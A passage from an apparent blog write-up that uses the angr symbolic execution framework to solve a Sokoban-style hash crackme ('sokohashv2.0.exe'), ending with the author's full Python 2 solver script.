##  #  ##  ##  ##  ##  ##    #
# ##    ####   ##  ##   ###  #
#                            #
#                            #
#                      yz    #
#                     O      #
/                            #
#                            #
"""

    valid = []
    invalid = (list(product(range(7,12),[9,10])) +
               list(product([7,8],[17,18])) )

    x = 1
    for line in var.splitlines():
        line = line.strip()
        line = line[1:len(line)-1]
        y = 1
        for i in line:
            if i not in ["O", "#", "/"]:
                if (x,y) not in invalid:
                    valid.append((x,y))
            y += 1
        x += 1   

    return valid
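
To see exactly which cells the invalid list removes, it can be expanded on its own. The sketch below reuses the same product() expression from get_valid_coords(). Reading the two blocks as the enclosed cells of the "O" and the "R" is an interpretation of the map above, not something confirmed against the binary.

```python
from itertools import product

# Same expression as in get_valid_coords(): each pair is (row, column),
# counted from 1 inside the outer border.
invalid = (list(product(range(7, 12), [9, 10])) +
           list(product([7, 8], [17, 18])))

# Rows 7-11, columns 9-10: a 5x2 block of 10 cells.
# Rows 7-8, columns 17-18: a 2x2 block of 4 cells.
print(len(invalid))   # 14
print(invalid[:3])    # [(7, 9), (7, 10), (8, 9)]
```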

After that we just need to load our memory dump and read the hashes. I will also store the dump in symbolic memory in case angr accesses it.

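def do_memset(state):
    base = 0x417490  # address where the dumped region starts
    with open("matrix.bin","rb") as f:
        content = f.read()

    # copy the dump into angr's memory, one byte at a time
    for offset, byte in enumerate(content):
        state.memory.store(base + offset, state.se.BVV(ord(byte), 8))

    # offsets of the first and last hash, relative to the start of the dump
    start_off = 0x41d450 - base
    end_off = 0x41e0c8 - base
    coords = []
    for i in xrange(start_off, end_off+8, 8):
        coords.append(struct.unpack("<Q", content[i:i+8])[0])

    return coords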
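
As a sanity check on the two addresses used above, the size of the hash table follows directly from them. This is a minimal sketch in plain Python (no angr needed); read_qwords is a hypothetical helper, and the byte string at the end is made-up data standing in for matrix.bin.

```python
import struct

BASE = 0x417490        # where the dump is loaded (from do_memset)
FIRST_HASH = 0x41d450  # address of the first hash
LAST_HASH = 0x41e0c8   # address of the last hash

# Each hash is 8 bytes, and the last address is inclusive.
num_hashes = (LAST_HASH - FIRST_HASH) // 8 + 1
print(num_hashes)  # 400


def read_qwords(blob, offset, count):
    """Hypothetical helper: read `count` little-endian 64-bit values."""
    chunk = blob[offset:offset + 8 * count]
    return list(struct.unpack("<%dQ" % count, chunk))


# Made-up data: 16 bytes of padding followed by three 64-bit values.
fake_dump = b"\x00" * 16 + struct.pack("<3Q", 0x1122334455667788, 2, 3)
values = read_qwords(fake_dump, 16, 3)
print(["%.16x" % v for v in values])
```

With the real dump, read_qwords(content, FIRST_HASH - BASE, num_hashes) should return the same list as the loop in do_memset, assuming matrix.bin really starts at 0x417490.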

After this we just map hashes to coordinates:

    coords = do_memset(init)
    coord_dict = {}
    count = 0
    for i in get_valid_coords():
        #print "%s = %.16x" % (i, coords[count])
        coord_dict[coords[count]] = i
        count += 1
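
The same dictionary is what later turns a solver answer back into board positions. The sketch below shows the idea with made-up hashes and coordinates: the 32-byte input buffer is four little-endian 64-bit hashes, one per box. decode_solution is a hypothetical helper and none of the values come from the game.

```python
import struct

# Made-up hash table and coordinates, standing in for coords and get_valid_coords().
fake_hashes = [0xAAAA000000000001, 0xBBBB000000000002,
               0xCCCC000000000003, 0xDDDD000000000004,
               0xEEEE000000000005]
fake_coords = [(1, 1), (1, 2), (1, 3), (2, 1), (2, 2)]

# zip() pairs the n-th hash with the n-th coordinate, like the counter loop.
coord_dict = dict(zip(fake_hashes, fake_coords))


def decode_solution(buf, table):
    """Hypothetical helper: split 32 bytes into four hashes and look each one up."""
    names = ["x", "y", "z", "w"]
    hashes = struct.unpack("<4Q", buf)
    return [(name, table[h]) for name, h in zip(names, hashes)]


# Pretend the solver returned the hashes of four distinct cells.
answer = struct.pack("<4Q", fake_hashes[4], fake_hashes[0],
                     fake_hashes[2], fake_hashes[1])
print(decode_solution(answer, coord_dict))
```

A hash that is missing from the table raises KeyError here, which is a quick way to spot a solution that does not correspond to any reachable board position.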

So now we have a map of hashes to coordinate pairs. The only thing left is to tell angr that each box hash is in that map and that each box must have a different hash (boxes cannot be stacked). To do this we apply constraints to each of the 8-byte input hashes.

    # search only for possible coords
    variables = []
    for i in xrange(0, 4):
        var = init.memory.load(init.regs.ebp + 0x8 + (0x8*i), 0x8, endness=proj.arch.memory_endness) 
        variables.append(var)
        conds = []
        for p in coords:
            conds.append(p == var)
        init.add_constraints(init.se.Or(*conds))

    # each coordinate must be distinct
    for v1,v2 in combinations(variables, 2):
        init.add_constraints(v1 != v2)
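
In plain Python terms, the two groups of constraints say the following. This is only an illustration of the logic with made-up values, not angr code, and satisfies is a hypothetical name.

```python
from itertools import combinations


def satisfies(boxes, allowed):
    """Return True if every box hash is a known board hash and no two are equal."""
    in_table = all(b in allowed for b in boxes)                # the Or(...) per box
    distinct = all(a != b for a, b in combinations(boxes, 2))  # the v1 != v2 pairs
    return in_table and distinct


allowed = {0x10, 0x20, 0x30, 0x40, 0x50}  # made-up stand-ins for the dumped hashes

print(satisfies([0x10, 0x20, 0x30, 0x40], allowed))  # True
print(satisfies([0x10, 0x10, 0x30, 0x40], allowed))  # False: two boxes stacked
print(satisfies([0x10, 0x20, 0x30, 0x99], allowed))  # False: 0x99 is not a board hash

# Four boxes give six unordered pairs, so six inequality constraints are added.
print(len(list(combinations(range(4), 2))))  # 6
```

The solver works the other way around: instead of checking a candidate, it only ever produces inputs for which both conditions already hold.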


We run it and…




:) 

This is by no means the only solution, and I have barely scratched the surface of what angr has to offer (multi-arch symbolic debugging with integrated solving seems fancy :> ), but I can say it is a joy to play with and a great addition to one's toolbox.

Facuman
@facuman

---
Below is the full solution:

import angr
import sys
import struct
from itertools import combinations, product

WIN_HASH = "C03922D0206DC3A33016010D6C66936E953ABAB9000010AE805CE8463CBE9A2D".decode("hex")


def get_valid_coords():
    var = """#                            #
#            O               #
#         x                  #
#                   w        #
#           *                #
# ##    ####   ######   ###  #
##  #  ##  ##  ##  ##  ##    #
##     ##  ##  ##  ##  ##    #
##     ##  ##  #####   ####  #
##     ##  ##  ## ##   ##    #
##  #  ##  ##  ##  ##  ##    #
# ##    ####   ##  ##   ###  #
#                            #
#                            #
#                      yz    #
#                     O      #
/                            #
#                            #
"""

    valid = []
    invalid = (list(product(range(7,12),[9,10])) +
               list(product([7,8],[17,18])) )

    x = 1
    for line in var.splitlines():
        line = line.strip()
        line = line[1:len(line)-1]
        y = 1
        for i in line:
            if i not in ["O", "#", "/"]:
                if (x,y) not in invalid:
                    valid.append((x,y))
            y += 1
        x += 1   

    return valid

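def do_memset(state):
    base = 0x417490  # address where the dumped region starts
    with open("matrix.bin","rb") as f:
        content = f.read()

    # copy the dump into angr's memory, one byte at a time
    for offset, byte in enumerate(content):
        state.memory.store(base + offset, state.se.BVV(ord(byte), 8))

    # offsets of the first and last hash, relative to the start of the dump
    start_off = 0x41d450 - base
    end_off = 0x41e0c8 - base
    coords = []
    for i in xrange(start_off, end_off+8, 8):
        coords.append(struct.unpack("<Q", content[i:i+8])[0])

    return coords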

def do_repmovsd(state):
    # angr does not like rep movsd
    # we do it by hand
    buffer = state.memory.load(state.regs.esi, 8 * 4)
    state.memory.store(state.regs.edi, buffer)

def do_nothing(state):
    pass

def get_hash_map(init_addr):
    addr = init_addr
    hash_map = []
    for i in xrange(0, len(WIN_HASH), 2):
        pair = WIN_HASH[i:i+2]
        hash_map.append((addr, ord(pair[1])))
        hash_map.append((addr+1, ord(pair[0])))
        addr += 8    

    return hash_map


def main():
    proj = angr.Project('sokohashv2.0.exe', use_sim_procedures=True, load_options={"auto_load_libs": False})

    # addrs 
    main = 0x401013
    to_find = 0x0040123E
    hash_addr = 0x04216C0

    # hooks
    func_hooks = [0x0040102C, 0x0401033]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=6) 

    func_hooks = [0x401215, 0x40121E, 0x401239, 0x40123C]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=2) 

    proj.hook(0x0401028, do_repmovsd, length=2)
    proj.hook(0x0401253, do_nothing, length=5) 
    proj.hook(0x040103E, do_nothing, length=5) 
    proj.hook(0x0401225, do_nothing, length=5) 
    proj.hook(0x0401243, do_nothing, length=5) 

    # initial state
    init = proj.factory.blank_state(addr=main)
    
    coords = do_memset(init)
    coord_dict = {}
    count = 0
    for i in get_valid_coords():
        #print "%s = %.16x" % (i, coords[count])
        coord_dict[coords[count]] = i
        count += 1

    init.regs.ebp = init.regs.esp + 0x78

    # search only for possible coords
    variables = []
    for i in xrange(0, 4):
        var = init.memory.load(init.regs.ebp + 0x8 + (0x8*i), 0x8, endness=proj.arch.memory_endness) 
        variables.append(var)
        conds = []
        for p in coords:
            conds.append(p == var)
        init.add_constraints(init.se.Or(*conds))

    # each coordinate must be distinct
    for v1,v2 in combinations(variables, 2):
        init.add_constraints(v1 != v2)

    buffer = init.memory.load(init.regs.ebp + 0x8, 0x20)
        
    pg = proj.factory.path_group(init, threads=8, save_unconstrained=True)
    pg.explore(find=to_find)

    path = pg.found[0]

    found = path.state

    # Resulting hash must be winning hash
    # Print expected hash and resulting hash for verification
    conds = []
    expected = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        memory = found.memory.load(addr, 1, endness=proj.arch.memory_endness) 
        conds.append((memory == value))
        expected.append((hex(addr), hex(value)))
    print "Expected is '%s'\n\n" % expected

    found.add_constraints(init.se.And(*conds))

    result = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        buf_ptr = found.memory.load(addr, 1)
        possible = found.se.any_int(buf_ptr)
        result.append((hex(addr), "0x%x" % possible))
    print "Result is '%s'\n\n" % result


    # Print solutions
    possible = found.se.any_n_int(buffer, 1)
    for i, f in enumerate(possible):
        out = "%x" % f
        if len(out) < (0x20*2):
            continue

        names = ["x","y","z","w"]
        values = []
        for j in xrange(0, len(out), 16):
            value = out[j:j+16]
            unpk_value = struct.unpack("<Q", value.decode("hex"))[0]

            values.append((names[j//16], coord_dict[unpk_value]))
        print "\tSolution %d: %s" % (i, values)


if __name__ == '__main__':
    #angr.path_group.l.setLevel('DEBUG')
    main()